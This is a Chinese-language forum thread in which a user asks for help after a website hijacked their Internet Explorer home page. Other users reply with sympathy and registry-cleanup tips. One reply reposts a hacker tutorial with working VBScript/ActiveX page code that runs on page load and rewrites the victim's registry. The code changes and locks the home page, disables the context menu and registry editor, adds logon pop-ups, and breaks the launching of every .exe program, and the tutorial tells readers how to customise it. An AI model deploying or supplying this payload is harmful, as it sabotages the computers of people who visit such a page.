my IE! help!

[辟邪]

My IE was hacked by a SOB website:www.jinpin.net
Every time when I opened IE, always that bullshit jumped out first! Anybody could give some ideas?

 

[假道学]

http://bbs.zaobao.com/cgi-bin/titest/tidisp.pl?index=polibbs92_6560

话题:恶意网页代码大揭密
内容:
警告：如果你想入侵我告诉你请离开，如果你是想学习就阅读下面文章，请遵守国家法律
（转自黑客任务实战---个人机漏洞篇）ActiveX修改注册表漏洞大家知道吧，危险等级5级，受影响环境与版本：
Win9x,WinME,WinNT5.0,Win2K下使用Internet Explorer 5x,Outlool Express5.x
原因和由来
由于在Internet世界中**老大已经因为Java的崛起而吃了一场败仗，因此硬是将Visual Basic Script移植到网页中并配合ActiveX的控制，让网页的设计更加活泼，有更多功能，而最重要的当然还是与MS-Office连成一体，因此Windows98以后的Windows各版本都假如ActiveX控制组件，以支持网页中VBScript的运行，不过问题出现了，由于该控制组件提供的功能太过于完整，造成网页 设计者或加入VBScript的网页文件有机会通过该组件所提供的功能来对浏览网页或阅读信笺的电脑进行各项黑客工作，例如更改或读取电脑中的注册表项，运行该电脑中的程序，。。。。。。
******><HEAD>
****** content="text/html; charset=gb2312" http-equiv=Content-Type>
</HEAD>
****** ******="WriteREG()">

******** Language="VBScript">

Dim WshShell
Set WshShell = CreateObject("WScript.Shell")

Function WriteREG()
WshShell.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://faqdiy.go.8866.org", "REG_SZ"
End Function

**********>
********>
********>
下面我就说明以下
你要加入的更改注册表项放在Function WriteREG()和End Function中间即可
项中的网址你可以自己更改。


更改IE主页
WshShell.RegWrite"HKCU\Software\Microsoft\Internet Explorer\Main\Start Page"http://faqdiy.go.8866.org","REG_SZ"
网址你可以随意更改


禁止更改IE主页
WshShell.RegWrite"HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","1","REG_DWORD"


更改IE窗口标题
WshShell.RegWrite"HKLM\Software\Microsoft\Internet Explorer\Main\Windows Title","黑客任务实战","REG_SZ"
汉字部分你可以任意更改


禁止使用IE的右键功能
WshShell.RegWrite"HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu","1","REG_DWORD"



禁止使用Internet选项中的高级设置
WshShell.RegWrite"HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced","1","REG_DWORD"
每次启动都弹出消息窗口
WshShell.RegWrite"HKLM\Software\Microfoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你好！","REG_SZ"
你好为消息窗口标题，你可以任意更改



WshShell.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","嘿嘿你被嘿了！","REG_SZ"
嘿嘿你被嘿了为消息内容你可以任意更改

怎么样上面的好玩吗？



禁止使用注册表编辑器
WshShell.RgeWrite"HKCU\Software\MicrosoftWindows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"




禁止运行任何程序（最狠！）
WshShell.RegWrite"HKCR\exefile\shell\open\command\","xx%!%*","REG_SZ"



好了本人转载此文章是为了让大家了解它而能更好的防护它。“知己知彼百战不殆！”
嘿嘿~~希望大家多多交流！
我是李小猫 声明：如果利用此文章入侵，一切后果自负与本人无关！入侵犯法！

 

[傻哥]

深切关注:blink:

 

[不戒]

极大同情:blink:

 

[酷猫1]

亲切慰问:blink:

 

[wen]

最初由 辟邪 发布
My IE was hacked by a SOB website:www.jinpin.net
Every time when I opened IE, always that bullshit jumped out first! Anybody could give some ideas?

打注册表编辑器（REGEDIT)查找www.jinpin.net。 找到后删除即可。

 

[不戒]

下载一个MYIE2，这是我用过最好的浏览器，用了N年了。而且，还在不停的升级中。。。
功能非常强大！ 你这个问题就可以解决了。

 

[辟邪]

试了一下WEN的方法，好像管用了
没想到在注册表里给改了十几个地方！！
假道学的技术还要再抽空研究研究。MyIE2也要试试的。

:thanks: :thanks:

 

[辟邪]

Bad news!

开机后修改注册表，发现很多被修改为“JINPIN”的地方。改回来重新启动计算机，再次检查注册表，发现又被改了！:flaming:

各位还有什么招教我？